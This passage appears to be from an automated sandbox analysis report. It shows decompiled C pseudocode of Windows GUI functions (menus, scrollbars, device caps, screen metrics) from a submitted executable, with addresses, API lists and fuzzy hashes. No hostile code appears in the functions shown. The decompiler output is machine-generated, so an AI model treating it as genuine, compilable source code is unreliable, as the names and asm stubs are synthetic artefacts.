				 *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x134)) + 8)) = 1;
				_t96 = E00404461(_t180, 0x40);
				 *(_t178 + 8) = _t96;
				 *(_t178 - 4) = 1;
				_t181 = _t96;
				if(_t96 == 0) {
					_t97 = 0;
					__eflags = 0;
				} else {
					_t97 = E0042CFA7(_t96, _t181);
				}
				_push( *((intOrPtr*)(_t177 + 0x134)));
				 *(_t178 - 4) =  *(_t178 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t177 + 0x90)) = _t97;
				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x8c)))) + 0x178))() != 0) {
					_t137 = _t177 + 0x94;
					E00422D9D(_t137, _t137, 1,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x134)))) + 0x74)) + 0x10)));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x90)))) + 0xc))( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x134)))) + 0x74)) + 0x10)));
					 *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x90)) + 0xc)) = 1;
					 *((intOrPtr*)(_t177 + 0xa0)) = 1;
					 *((intOrPtr*)( *_t137 + 0x1c))();
					_t110 = GetDC( *(_t177 + 0x20));
					 *(_t178 + 8) = _t110;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x90)))) + 0x10))(_t110);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x8c)))) + 0x17c))( *((intOrPtr*)(_t177 + 0x90)),  *((intOrPtr*)(_t177 + 0x134)));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x90)))) + 0x18))();
					ReleaseDC( *(_t177 + 0x20),  *(_t178 + 8));
					 *((intOrPtr*)( *_t137 + 0x20))(0xffffffff);
					_t138 = _t177 + 0x9c;
					 *((intOrPtr*)(_t177 + 0x124)) = GetDeviceCaps( *_t138, 0x58);
					 *((intOrPtr*)(_t177 + 0x128)) = GetDeviceCaps( *_t138, 0x5a);
					_t122 =  *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x134)) + 0x18));
					 *((intOrPtr*)(_t177 + 0x118)) = _t122;
					_t183 = _t122;
					if(_t122 != 0) {
						_t151 =  *((intOrPtr*)(_t177 + 0x110));
						__eflags = _t122 - _t151;
						if(__eflags > 0) {
							 *((intOrPtr*)(_t177 + 0x118)) = _t151;
						}
					} else {
						 *((intOrPtr*)(_t177 + 0x118)) = 1;
					}
					 *((intOrPtr*)(_t177 + 0x108)) =  *((intOrPtr*)(_t177 + 0x118));
					_push(0x4527fc);
					_push(0x4527fc);
					_push(1);
					_push(1);
					_push(1);
					E00419E93(_t138, _t177, 1, _t177, _t183);
					_t126 =  *((intOrPtr*)(_t177 + 0x134));
					_t155 =  *((intOrPtr*)( *_t126 + 0x74));
					_t170 =  *(_t155 + 0x1e) & 0x0000ffff;
					if(_t170 >= 0x8000 || (_t170 & 0x0000ffff) - ( *(_t155 + 0x1c) & 0x0000ffff) > 0x7fff) {
						ShowScrollBar( *(_t177 + 0x20), 1, 0);
					} else {
						 *((intOrPtr*)(_t178 - 0x24)) = 3;
						 *(_t178 - 0x20) =  *( *((intOrPtr*)( *_t126 + 0x74)) + 0x1c) & 0x0000ffff;
						 *(_t178 - 0x1c) =  *( *((intOrPtr*)( *_t126 + 0x74)) + 0x1e) & 0x0000ffff;
						 *((intOrPtr*)(_t178 - 0x18)) = 1;
						if(E0040CE62(_t177, 1, _t178 - 0x28, 0) == 0) {
							E0040DAD4(_t177, 1,  *(_t178 - 0x20),  *(_t178 - 0x1c), _t134);
						}
					}
					E0041BAC8(_t177,  *((intOrPtr*)( *((intOrPtr*)(_t177 + 0x134)) + 0x14)), 1);
				}
				return E00431B73(1);
			}


















                  0x0041bd1e
                  0x0041bd1e
                  0x0041bd25
                  0x0041bd2a
                  0x0041bd31
                  0x0041bd37
                  0x0041bd3d
                  0x0041bd40
                  0x0041bd44
                  0x0041bd46
                  0x0041bd51
                  0x0041bd51
                  0x0041bd48
                  0x0041bd4a
                  0x0041bd4a
                  0x0041bd53
                  0x0041bd57
                  0x0041bd5f
                  0x0041bd71
                  0x0041bd80
                  0x0041bd92
                  0x0041bd95
                  0x0041bd9b
                  0x0041bd9e
                  0x0041bda1
                  0x0041bda3
                  0x0041bdae
                  0x0041bdae
                  0x0041bda5
                  0x0041bda7
                  0x0041bda7
                  0x0041bdb6
                  0x0041bdbc
                  0x0041bdc0
                  0x0041bdd0
                  0x0041bde4
                  0x0041bdec
                  0x0041be07
                  0x0041be10
                  0x0041be17
                  0x0041be1d
                  0x0041be23
                  0x0041be32
                  0x0041be35
                  0x0041be4c
                  0x0041be5a
                  0x0041be63
                  0x0041be6f
                  0x0041be74
                  0x0041be86
                  0x0041be92
                  0x0041be9e
                  0x0041bea1
                  0x0041bea7
                  0x0041bea9
                  0x0041beb3
                  0x0041beb9
                  0x0041bebb
                  0x0041bebd
                  0x0041bebd
                  0x0041beab
                  0x0041beab
                  0x0041beab
                  0x0041bec9
                  0x0041bed4
                  0x0041bed5
                  0x0041bed6
                  0x0041bed9
                  0x0041beda
                  0x0041bedd
                  0x0041bee2
                  0x0041beea
                  0x0041beed
                  0x0041bef9
                  0x0041bf57
                  0x0041bf0c
                  0x0041bf0c
                  0x0041bf1c
                  0x0041bf28
                  0x0041bf34
                  0x0041bf3e
                  0x0041bf4a
                  0x0041bf4a
                  0x0041bf3e
                  0x0041bf69
                  0x0041bf6e
                  0x0041bf75

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041BD25
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  • GetDC.USER32(?), ref: 0041BE23
                  • ReleaseDC.USER32 ref: 0041BE63
                  • GetDeviceCaps.GDI32(?,00000058), ref: 0041BE7C
                  • GetDeviceCaps.GDI32(?,0000005A), ref: 0041BE8C
                    • Part of subcall function 0041A640: __EH_prolog3.LIBCMT ref: 0041A647
                  • ShowScrollBar.USER32(?,00000001,00000000,00000001,00000001,00000001,004527FC,004527FC), ref: 0041BF57
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CapsDeviceH_prolog3$ReleaseScrollShow_malloc
                  • String ID:
                  • API String ID: 1562107534-0
                  • Opcode ID: 01a3991f0f1f20f80a4ca669fb0ae59081bcd1eef430dde7ee83eab0a47d67fc
                  • Instruction ID: 2ce643b0088d7514c621479e681820788cef9607f7a2c67b11f747b9a6edd5a3
                  • Opcode Fuzzy Hash: 01a3991f0f1f20f80a4ca669fb0ae59081bcd1eef430dde7ee83eab0a47d67fc
                  • Instruction Fuzzy Hash: 6871E3746006009FDB14DF75C985BAABBF1FF49300F10496EE9AA8B3A1DB34E941DB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040949A, Relevance: 9.1, APIs: 6, Instructions: 149windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E0040949A(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t53;
				intOrPtr* _t54;
				struct HMENU__* _t58;
				int _t59;
				int _t60;
				struct HMENU__* _t61;
				int _t63;
				void* _t65;
				signed int _t67;
				int _t68;
				struct HMENU__* _t69;
				struct HMENU__* _t70;
				int _t71;
				intOrPtr* _t75;
				int _t78;
				struct HMENU__* _t86;
				intOrPtr _t90;
				intOrPtr* _t92;
				int _t93;
				struct HMENU__* _t94;

				_t79 = __ecx;
				_t92 = __ecx;
				_v8 = __ecx;
				_t53 = E0041FEC0( *((intOrPtr*)(__ecx + 0x20)));
				if(_a12 == 0) {
					_t54 = __ecx + 0x80;
					_t90 = _a4;
					if( *_t54 == 0) {
						L3:
						_t98 = _t90;
						if(_t90 == 0) {
							E00406436(0, _t79, _t90, _t92, _t98);
						}
						E004125EB( &_v48);
						_v36 = _t90;
						if( *((intOrPtr*)(E0041EDAB(0, _t90, _t92, _t98) + 0x78)) !=  *(_t90 + 4)) {
							__eflags =  *((intOrPtr*)(_t92 + 0xd4)) - 1;
							if( *((intOrPtr*)(_t92 + 0xd4)) != 1) {
								_t58 =  *(_t92 + 0xd8);
							} else {
								_t58 = GetMenu( *(_t92 + 0x20));
							}
							__eflags = _t58;
							if(_t58 == 0) {
								goto L20;
							} else {
								_t69 = E004105B2(0, _t92, _t90);
								__eflags = _t69;
								if(_t69 == 0) {
									goto L20;
								}
								_t86 = _t69;
								_t70 =  *((intOrPtr*)(_t69->i + 0x6c))();
								__eflags = _t70;
								if(_t70 == 0) {
									goto L20;
								}
								_t94 =  *(_t70 + 4);
								__eflags = _t94;
								if(_t94 == 0) {
									L19:
									_t92 = _v8;
									goto L20;
								}
								_t71 = GetMenuItemCount(_t94);
								_t78 = 0;
								_a12 = _t71;
								__eflags = _t71;
								if(_t71 <= 0) {
									goto L19;
								} else {
									goto L15;
								}
								while(1) {
									L15:
									__eflags = GetSubMenu(_t94, _t78) -  *(_t90 + 4);
									if(__eflags == 0) {
										break;
									}
									_t78 = _t78 + 1;
									__eflags = _t78 - _a12;
									if(_t78 < _a12) {
										continue;
									}
									goto L19;
								}
								_v12 = E0041F4E8(_t78, _t86, _t90, _t94, __eflags, _t94);
								goto L19;
							}
						} else {
							_v12 = _t90;
							L20:
							_t59 = GetMenuItemCount( *(_t90 + 4));
							_v40 = _v40 & 0x00000000;
							_v16 = _t59;
							if(_t59 <= 0) {
								L39:
								return _t59;
							} else {
								goto L21;
							}
							do {
								L21:
								_t60 = E004087B8(_t90, _v40);
								_v44 = _t60;
								if(_t60 == 0) {
									goto L38;
								}
								if(_t60 != 0xffffffff) {
									_v32 = _v32 & 0x00000000;
									__eflags =  *(_t92 + 0x54);
									if( *(_t92 + 0x54) == 0) {
										L30:
										_t61 = 0;
										__eflags = 0;
										L31:
										_push(_t61);
										L32:
										_push(_t92);
										E00412611( &_v48);
										_t63 = GetMenuItemCount( *(_t90 + 4));
										_t93 = _t63;
										if(_t93 >= _v16) {
											L37:
											_v16 = _t93;
											_t92 = _v8;
											goto L38;
										}
										_v40 = _v40 + _t63 - _v16;
										while(_v40 < _t93) {
											_t65 = E004087B8(_t90, _v40);
											__eflags = _t65 - _v44;
											if(_t65 != _v44) {
												goto L37;
											}
											_t44 =  &_v40;
											 *_t44 = _v40 + 1;
											__eflags =  *_t44;
										}
										goto L37;
									}
									__eflags = _t60 - 0xf000;
									if(_t60 >= 0xf000) {
										goto L30;
									}
									_t61 = 1;
									goto L31;
								}
								_t67 = E004049DB(_t90, _v40);
								_v32 = _t67;
								if(_t67 == 0) {
									goto L38;
								}
								_t68 = GetMenuItemID( *(_t67 + 4), 0);
								_v44 = _t68;
								if(_t68 != 0 && _t68 != 0xffffffff) {
									_push(0);
									goto L32;
								}
								L38:
								_v40 = _v40 + 1;
								_t59 = _v40;
							} while (_t59 < _v16);
							goto L39;
						}
					}
					_t75 =  *_t54;
					_t79 = _t75;
					_t59 =  *((intOrPtr*)( *_t75 + 0x74))(_t90, _a8, 0);
					if(_t59 != 0) {
						goto L39;
					}
					goto L3;
				}
				return _t53;
			}



































                  0x0040949a
                  0x004094a4
                  0x004094a9
                  0x004094ac
                  0x004094b6
                  0x004094bc
                  0x004094c3
                  0x004094c8
                  0x004094e0
                  0x004094e0
                  0x004094e2
                  0x004094e4
                  0x004094e4
                  0x004094ec
                  0x004094f1
                  0x004094ff
                  0x00409506
                  0x0040950d
                  0x0040951a
                  0x0040950f
                  0x00409512
                  0x00409512
                  0x00409520
                  0x00409522
                  0x00000000
                  0x00409524
                  0x00409526
                  0x0040952b
                  0x0040952d
                  0x00000000
                  0x00000000
                  0x00409531
                  0x00409533
                  0x00409536
                  0x00409538
                  0x00000000
                  0x00000000
                  0x0040953a
                  0x0040953d
                  0x0040953f
                  0x0040956f
                  0x0040956f
                  0x00000000
                  0x0040956f
                  0x00409542
                  0x00409548
                  0x0040954a
                  0x0040954d
                  0x0040954f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00409551
                  0x00409551
                  0x00409559
                  0x0040955c
                  0x00000000
                  0x00000000
                  0x0040955e
                  0x0040955f
                  0x00409562
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00409564
                  0x0040956c
                  0x00000000
                  0x0040956c
                  0x00409501
                  0x00409501
                  0x00409572
                  0x0040957b
                  0x0040957d
                  0x00409581
                  0x00409586
                  0x00409634
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040958c
                  0x0040958c
                  0x00409591
                  0x00409596
                  0x0040959b
                  0x00000000
                  0x00000000
                  0x004095a4
                  0x004095d2
                  0x004095d6
                  0x004095da
                  0x004095e8
                  0x004095e8
                  0x004095e8
                  0x004095ea
                  0x004095ea
                  0x004095eb
                  0x004095eb
                  0x004095ef
                  0x004095f7
                  0x004095f9
                  0x004095fe
                  0x0040961f
                  0x0040961f
                  0x00409622
                  0x00000000
                  0x00409622
                  0x00409603
                  0x0040961a
                  0x0040960d
                  0x00409612
                  0x00409615
                  0x00000000
                  0x00000000
                  0x00409617
                  0x00409617
                  0x00409617
                  0x00409617
                  0x00000000
                  0x0040961a
                  0x004095dc
                  0x004095e1
                  0x00000000
                  0x00000000
                  0x004095e5
                  0x00000000
                  0x004095e5
                  0x004095ab
                  0x004095b0
                  0x004095b5
                  0x00000000
                  0x00000000
                  0x004095bc
                  0x004095c2
                  0x004095c7
                  0x004095ce
                  0x00000000
                  0x004095ce
                  0x00409625
                  0x00409625
                  0x00409628
                  0x0040962b
                  0x00000000
                  0x0040958c
                  0x004094ff
                  0x004094ca
                  0x004094d2
                  0x004094d5
                  0x004094da
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004094da
                  0x00409638

                  APIs
                    • Part of subcall function 0041FEC0: GetFocus.USER32(?,?,00404DAE,?), ref: 0041FEC6
                    • Part of subcall function 0041FEC0: GetParent.USER32(00000000), ref: 0041FEEE
                    • Part of subcall function 0041FEC0: GetWindowLongA.USER32 ref: 0041FF09
                    • Part of subcall function 0041FEC0: GetParent.USER32(?), ref: 0041FF17
                    • Part of subcall function 0041FEC0: GetDesktopWindow.USER32 ref: 0041FF1B
                    • Part of subcall function 0041FEC0: SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 0041FF2F
                  • GetMenu.USER32(?), ref: 00409512
                  • GetMenuItemCount.USER32 ref: 00409542
                  • GetSubMenu.USER32 ref: 00409553
                  • GetMenuItemCount.USER32 ref: 0040957B
                  • GetMenuItemID.USER32(?,00000000), ref: 004095BC
                  • GetMenuItemCount.USER32 ref: 004095F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                  • String ID:
                  • API String ID: 4186786570-0
                  • Opcode ID: f4d0c37e46bafa235edddf6592dad6ee73eab23a505eaa072581090a8f977f9a
                  • Instruction ID: a1f41ced9be115099f6dad47dd6d5c3d84b9b036084ce77a4042d75358e62180
                  • Opcode Fuzzy Hash: f4d0c37e46bafa235edddf6592dad6ee73eab23a505eaa072581090a8f977f9a
                  • Instruction Fuzzy Hash: 4D517C32900606AFCF229F66C9806AEB7B5FF45304F24457BE416B3292D739DE41CB68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004255C9, Relevance: 9.1, APIs: 6, Instructions: 145COMMON
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E004255C9(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _t81;
				int _t83;
				int _t90;
				intOrPtr _t92;
				intOrPtr _t111;
				int _t125;
				void* _t134;
				void* _t139;
				intOrPtr _t143;
				void* _t145;
				void* _t149;

				_t145 = __edi;
				_t134 = __ecx;
				_t81 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t139 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_t143 =  *((intOrPtr*)(__ecx + 0x8c));
				_t149 = 2;
				if(_t143 == 0xa) {
					L7:
					 *((intOrPtr*)(_t134 + 0x28)) =  *((intOrPtr*)(_t134 + 0x28)) + _t81;
					L9:
					_t83 =  *((intOrPtr*)(_t134 + 0x30)) -  *((intOrPtr*)(_t134 + 0x28));
					__eflags = _t83;
					L10:
					if(_t83 < 0) {
						_t83 = 0;
					}
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0x68)))) + 0x140))( &_v12, _t83, _t149, _t145);
					_v44.left = GetSystemMetrics(0x4c);
					_v44.top = GetSystemMetrics(0x4d);
					_v44.right = GetSystemMetrics(0x4e) + _v44.left;
					_t90 = GetSystemMetrics(0x4f);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v44.bottom = _t90 + _v44.top;
					_t92 =  *((intOrPtr*)(_t134 + 0x8c));
					asm("movsd");
					if(_t92 == 0xa || _t92 == 0xc) {
						_v28.left =  *((intOrPtr*)(_t134 + 0x58)) -  *((intOrPtr*)(_t134 + 0x60)) - _v12 + _v28.right;
						_v28.top =  *((intOrPtr*)(_t134 + 0x5c)) -  *((intOrPtr*)(_t134 + 0x64)) - _v8 + _v28.bottom;
						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t134 + 0x38)) =  *((intOrPtr*)(_t134 + 0x40)) - _v12;
							_t111 =  *((intOrPtr*)(_t134 + 0x44)) - _v8;
							__eflags = _t111;
							 *((intOrPtr*)(_t134 + 0x3c)) = _t111;
							 *(_t134 + 0x48) = _v28.left;
							 *((intOrPtr*)(_t134 + 0x4c)) = _v28.top;
						}
					} else {
						_v28.right =  *((intOrPtr*)(_t134 + 0x60)) -  *((intOrPtr*)(_t134 + 0x58)) + _v28.left + _v12;
						_v28.bottom =  *((intOrPtr*)(_t134 + 0x64)) -  *((intOrPtr*)(_t134 + 0x5c)) + _v28.top + _v8;
						_t125 = IntersectRect( &_v60,  &_v44,  &_v28);
						_t162 = _t125;
						if(_t125 != 0) {
							 *((intOrPtr*)(_t134 + 0x40)) =  *((intOrPtr*)(_t134 + 0x38)) + _v12;
							 *((intOrPtr*)(_t134 + 0x44)) =  *((intOrPtr*)(_t134 + 0x3c)) + _v8;
							 *((intOrPtr*)(_t134 + 0x50)) = _v28.right;
							 *((intOrPtr*)(_t134 + 0x54)) = _v28.bottom;
						}
					}
					 *((intOrPtr*)(_t134 + 4)) = _a4;
					 *((intOrPtr*)(_t134 + 8)) = _a8;
					return E004253B4(_t134, _t162, 0);
				}
				if(_t143 == 0xb) {
					__eflags = _t143 - 0xa;
					if(_t143 != 0xa) {
						_t14 = __ecx + 0x30;
						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t81;
						__eflags =  *_t14;
						goto L9;
					}
					goto L7;
				} else {
					_t149 = 0x22;
					if(_t143 != 0xc) {
						_t8 = __ecx + 0x34;
						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t139;
						__eflags =  *_t8;
					} else {
						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t139;
					}
					_t83 =  *((intOrPtr*)(_t134 + 0x34)) -  *((intOrPtr*)(_t134 + 0x2c));
					goto L10;
				}
			}



















                  0x004255c9
                  0x004255d5
                  0x004255dd
                  0x004255e3
                  0x004255e5
                  0x004255ed
                  0x004255f1
                  0x00425615
                  0x00425615
                  0x0042561d
                  0x00425620
                  0x00425620
                  0x00425623
                  0x00425625
                  0x00425627
                  0x00425627
                  0x00425635
                  0x00425647
                  0x0042564e
                  0x00425658
                  0x0042565b
                  0x00425666
                  0x00425667
                  0x00425668
                  0x00425669
                  0x0042566c
                  0x00425672
                  0x00425677
                  0x004256de
                  0x004256ed
                  0x00425702
                  0x00425704
                  0x0042570c
                  0x00425712
                  0x00425712
                  0x00425715
                  0x0042571b
                  0x00425721
                  0x00425721
                  0x0042567e
                  0x0042568a
                  0x00425699
                  0x004256a8
                  0x004256ae
                  0x004256b0
                  0x004256b8
                  0x004256c1
                  0x004256c7
                  0x004256cd
                  0x004256cd
                  0x004256b0
                  0x00425727
                  0x00425731
                  0x0042573c
                  0x0042573c
                  0x004255f6
                  0x00425610
                  0x00425613
                  0x0042561a
                  0x0042561a
                  0x0042561a
                  0x00000000
                  0x0042561a
                  0x00000000
                  0x004255f8
                  0x004255fa
                  0x004255fe
                  0x00425605
                  0x00425605
                  0x00425605
                  0x00425600
                  0x00425600
                  0x00425600
                  0x0042560b
                  0x00000000
                  0x0042560b

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MetricsSystem$IntersectRect
                  • String ID:
                  • API String ID: 1124862357-0
                  • Opcode ID: 1d65fe79de01662ac3f1d7a7a64e2e1c0a778bd027e79d9ab25bf57574dbdca1
                  • Instruction ID: b54a87e4effa50ea3713c06c2bd7ae8c4480a2440e2015c51580e4fd092a2efb
                  • Opcode Fuzzy Hash: 1d65fe79de01662ac3f1d7a7a64e2e1c0a778bd027e79d9ab25bf57574dbdca1
                  • Instruction Fuzzy Hash: 2851A472A00219DFCF54DFACD5C5A9EBBF4BF08314F5441A6E908EB20AE634E980CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042BA2F, Relevance: 9.1, APIs: 6, Instructions: 140windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 81%
                  			E0042BA2F(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t67;
				long _t70;
				intOrPtr _t72;
				long _t77;
				intOrPtr* _t89;
				intOrPtr* _t91;
				void* _t92;
				intOrPtr* _t93;
				intOrPtr* _t97;
				void* _t105;
				void* _t109;
				intOrPtr _t111;
				void* _t125;
				intOrPtr* _t126;
				void* _t130;

				_t122 = __edx;
				_push(0x10);
				E00431A9B(E0044C7C2, __ebx, __edi, __esi);
				_t125 = __ecx;
				_t100 = 0;
				_t129 = 1;
				 *(_t130 - 0x1c) = 0;
				if( *((intOrPtr*)(__ecx + 0x78)) != 1) {
					__eflags =  *( *((intOrPtr*)(__ecx + 0x74)) + 0x34) & 0x00080000;
					if(__eflags == 0) {
						L19:
						_push( *((intOrPtr*)( *((intOrPtr*)(_t125 + 0x74)) + 0x1c)));
						E00406039(_t100,  *((intOrPtr*)(_t130 + 8)), _t122, _t125, _t129, __eflags);
						L20:
						return E00431B73( *((intOrPtr*)(_t130 + 8)));
					}
					__eflags =  *(__ecx + 0x20);
					if(__eflags == 0) {
						goto L19;
					}
					E004014C0(_t130 - 0x10, __edx);
					 *(_t130 - 4) = 1;
					_t129 = 0x104;
					_t67 = E004014F0(_t130 - 0x10, 0x104);
					_t100 = GetParent;
					 *(_t130 - 0x1c) = _t67;
					_t70 = SendMessageA( *(E0040EE3C(GetParent, _t130 - 0x10, GetParent( *(_t125 + 0x20))) + 0x20), 0x464, 0x104,  *(_t130 - 0x1c));
					_t105 = _t130 - 0x10;
					__eflags = _t70;
					if(_t70 >= 0) {
						E0040A356(_t105, 0xffffffff);
					} else {
						E00401E30(_t105);
					}
					_t72 =  *((intOrPtr*)(_t130 - 0x10));
					__eflags =  *(_t72 - 0xc);
					if( *(_t72 - 0xc) == 0) {
						L18:
						 *(_t130 - 4) =  *(_t130 - 4) | 0xffffffff;
						__eflags =  *((intOrPtr*)(_t130 - 0x10)) + 0xfffffff0;
						E004010B0( *((intOrPtr*)(_t130 - 0x10)) + 0xfffffff0, _t122);
						goto L19;
					} else {
						 *(_t130 - 0x1c) = E004014F0(_t130 - 0x10, _t129);
						_t77 = SendMessageA( *(E0040EE3C(_t100, _t130 - 0x10, GetParent( *(_t125 + 0x20))) + 0x20), 0x465, _t129,  *(_t130 - 0x1c));
						_t109 = _t130 - 0x10;
						__eflags = _t77;
						if(_t77 >= 0) {
							E0040A356(_t109, 0xffffffff);
							E00405562( *((intOrPtr*)(_t130 + 8)), __eflags, _t130 - 0x10);
							_t111 =  *((intOrPtr*)(_t130 - 0x10));
							L9:
							E004010B0(_t111 + 0xfffffff0, _t122);
							goto L20;
						}
						E00401E30(_t109);
						goto L18;
					}
				}
				if( *(__ecx + 0x20) == 0) {
					goto L19;
				}
				E004014C0(_t130 - 0x14, __edx);
				_t126 =  *((intOrPtr*)(_t125 + 0x80));
				_push(_t130 - 0x10);
				_push(_t126);
				 *(_t130 - 4) = 0;
				if( *((intOrPtr*)( *_t126 + 0x38))() < 0) {
					L8:
					E00405562( *((intOrPtr*)(_t130 + 8)), _t137, _t130 - 0x14);
					_t111 =  *((intOrPtr*)(_t130 - 0x14));
					goto L9;
				}
				_t89 =  *((intOrPtr*)(_t130 - 0x10));
				_push(_t130 - 0x1c);
				_push(0x400000);
				_push(_t89);
				if( *((intOrPtr*)( *_t89 + 0x18))() != 1) {
					L5:
					_t91 =  *((intOrPtr*)(_t130 - 0x10));
					_t122 = _t130 - 0x18;
					 *((intOrPtr*)(_t130 - 0x18)) = _t100;
					_t92 =  *((intOrPtr*)( *_t91 + 0x14))(_t91, 0x80058000, _t130 - 0x18);
					_t137 = _t92;
					if(_t92 >= 0) {
						E00405DD1(_t130 - 0x14,  *((intOrPtr*)(_t130 - 0x18)));
						E0040A356(_t130 - 0x14, 0xffffffff);
						__imp__CoTaskMemFree( *((intOrPtr*)(_t130 - 0x18)));
					}
					L7:
					_t93 =  *((intOrPtr*)(_t130 - 0x10));
					 *((intOrPtr*)( *_t93 + 8))(_t93);
					goto L8;
				}
				_t97 =  *((intOrPtr*)(_t130 - 0x10));
				_t122 = _t130 - 0x1c;
				_push(_t130 - 0x1c);
				_push(0x20000000);
				_push(_t97);
				if( *((intOrPtr*)( *_t97 + 0x18))() == 0) {
					goto L7;
				}
				goto L5;
			}


















                  0x0042ba2f
                  0x0042ba2f
                  0x0042ba36
                  0x0042ba3b
                  0x0042ba3f
                  0x0042ba41
                  0x0042ba42
                  0x0042ba48
                  0x0042bb01
                  0x0042bb08
                  0x0042bbb8
                  0x0042bbbb
                  0x0042bbc1
                  0x0042bbc6
                  0x0042bbce
                  0x0042bbce
                  0x0042bb0e
                  0x0042bb11
                  0x00000000
                  0x00000000
                  0x0042bb1a
                  0x0042bb1f
                  0x0042bb22
                  0x0042bb2b
                  0x0042bb33
                  0x0042bb39
                  0x0042bb50
                  0x0042bb56
                  0x0042bb59
                  0x0042bb5b
                  0x0042bb66
                  0x0042bb5d
                  0x0042bb5d
                  0x0042bb5d
                  0x0042bb6b
                  0x0042bb6e
                  0x0042bb72
                  0x0042bba9
                  0x0042bbac
                  0x0042bbb0
                  0x0042bbb3
                  0x00000000
                  0x0042bb74
                  0x0042bb80
                  0x0042bb97
                  0x0042bb9d
                  0x0042bba0
                  0x0042bba2
                  0x0042bbd3
                  0x0042bbdf
                  0x0042bbe4
                  0x0042baf1
                  0x0042baf4
                  0x00000000
                  0x0042baf4
                  0x0042bba4
                  0x00000000
                  0x0042bba4
                  0x0042bb72
                  0x0042ba51
                  0x00000000
                  0x00000000
                  0x0042ba5a
                  0x0042ba5f
                  0x0042ba6a
                  0x0042ba6b
                  0x0042ba6c
                  0x0042ba74
                  0x0042bae2
                  0x0042bae9
                  0x0042baee
                  0x00000000
                  0x0042baee
                  0x0042ba76
                  0x0042ba7e
                  0x0042ba7f
                  0x0042ba84
                  0x0042ba8a
                  0x0042baa2
                  0x0042baa2
                  0x0042baa5
                  0x0042baae
                  0x0042bab4
                  0x0042bab7
                  0x0042bab9
                  0x0042bac1
                  0x0042bacb
                  0x0042bad3
                  0x0042bad3
                  0x0042bad9
                  0x0042bad9
                  0x0042badf
                  0x00000000
                  0x0042badf
                  0x0042ba8c
                  0x0042ba91
                  0x0042ba94
                  0x0042ba95
                  0x0042ba9a
                  0x0042baa0
